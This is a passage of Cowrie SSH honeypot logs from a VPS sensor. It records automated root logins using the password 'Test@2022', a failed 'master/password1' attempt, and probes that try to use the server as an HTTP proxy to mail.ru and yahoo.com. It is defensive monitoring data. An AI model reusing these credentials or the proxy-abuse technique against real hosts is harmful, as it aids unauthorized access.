3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.034462Z","src_ip":"77.83.207.83","session":"fdf1dbd19fed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.287063Z","src_ip":"77.83.207.83","session":"fdf1dbd19fed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":50,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:50","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.338472Z","session":"fdf1dbd19fed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.389252Z","src_ip":"77.83.207.83","session":"fdf1dbd19fed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":8133,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:8133","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.533208Z","session":"fdf1dbd19fed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.583992Z","src_ip":"77.83.207.83","session":"fdf1dbd19fed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41654,"dst_ip":"1.2.3.4","dst_port":22,"session":"55f29d6de8b7","protocol":"ssh","message":"New connection: 212.227.125.160:41654 (1.2.3.4:22) [session: 55f29d6de8b7]","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.599373Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":6244,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6244","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.724982Z","session":"fdf1dbd19fed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.775584Z","src_ip":"77.83.207.83","session":"fdf1dbd19fed"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.826979Z","src_ip":"77.83.207.83","session":"fdf1dbd19fed"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47636,"dst_ip":"1.2.3.4","dst_port":22,"session":"73965106839a","protocol":"ssh","message":"New connection: 77.83.207.83:47636 (1.2.3.4:22) [session: 73965106839a]","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.877641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.878200Z","src_ip":"77.83.207.83","session":"73965106839a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:04.928774Z","src_ip":"77.83.207.83","session":"73965106839a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.050261Z","src_ip":"212.227.125.160","session":"55f29d6de8b7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.051222Z","src_ip":"212.227.125.160","session":"55f29d6de8b7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.179488Z","src_ip":"77.83.207.83","session":"73965106839a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18045,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:18045","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.230716Z","session":"73965106839a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.281290Z","src_ip":"77.83.207.83","session":"73965106839a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":3724,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:3724","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.424781Z","session":"73965106839a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.475182Z","src_ip":"77.83.207.83","session":"73965106839a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":25110,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25110","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.616470Z","session":"73965106839a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.666925Z","src_ip":"77.83.207.83","session":"73965106839a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.717981Z","src_ip":"77.83.207.83","session":"73965106839a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47735,"dst_ip":"1.2.3.4","dst_port":22,"session":"fffe7ee6f54b","protocol":"ssh","message":"New connection: 77.83.207.83:47735 (1.2.3.4:22) [session: fffe7ee6f54b]","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.766523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.776406Z","src_ip":"77.83.207.83","session":"fffe7ee6f54b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:05.816902Z","src_ip":"77.83.207.83","session":"fffe7ee6f54b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.065963Z","src_ip":"77.83.207.83","session":"fffe7ee6f54b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4516,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4516","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.116757Z","session":"fffe7ee6f54b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.166917Z","src_ip":"77.83.207.83","session":"fffe7ee6f54b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31612,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31612","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.308282Z","session":"fffe7ee6f54b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.358627Z","src_ip":"77.83.207.83","session":"fffe7ee6f54b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":25890,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25890","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.500342Z","session":"fffe7ee6f54b"}
{"eventid":"cowrie.login.failed","username":"master","password":"password1","message":"login attempt [master/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.527565Z","src_ip":"212.227.125.160","session":"55f29d6de8b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.550691Z","src_ip":"77.83.207.83","session":"fffe7ee6f54b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.601399Z","src_ip":"77.83.207.83","session":"fffe7ee6f54b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47800,"dst_ip":"1.2.3.4","dst_port":22,"session":"20608ffb8186","protocol":"ssh","message":"New connection: 77.83.207.83:47800 (1.2.3.4:22) [session: 20608ffb8186]","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.651267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.652244Z","src_ip":"77.83.207.83","session":"20608ffb8186"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.702748Z","src_ip":"77.83.207.83","session":"20608ffb8186"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:06.954488Z","src_ip":"77.83.207.83","session":"20608ffb8186"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32233,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32233","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.006521Z","session":"20608ffb8186"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.057172Z","src_ip":"77.83.207.83","session":"20608ffb8186"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15143,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15143","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.200858Z","session":"20608ffb8186"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.251710Z","src_ip":"77.83.207.83","session":"20608ffb8186"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":695,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:695","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.392689Z","session":"20608ffb8186"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.443115Z","src_ip":"77.83.207.83","session":"20608ffb8186"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.494212Z","src_ip":"77.83.207.83","session":"20608ffb8186"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47904,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ecfbc776295","protocol":"ssh","message":"New connection: 77.83.207.83:47904 (1.2.3.4:22) [session: 1ecfbc776295]","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.543559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.544398Z","src_ip":"77.83.207.83","session":"1ecfbc776295"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.594699Z","src_ip":"77.83.207.83","session":"1ecfbc776295"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.845443Z","src_ip":"77.83.207.83","session":"1ecfbc776295"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32505,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32505","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.896929Z","session":"1ecfbc776295"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.947260Z","src_ip":"77.83.207.83","session":"1ecfbc776295"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:07.980107Z","src_ip":"212.227.125.160","session":"55f29d6de8b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3955,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3955","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.088728Z","session":"1ecfbc776295"}
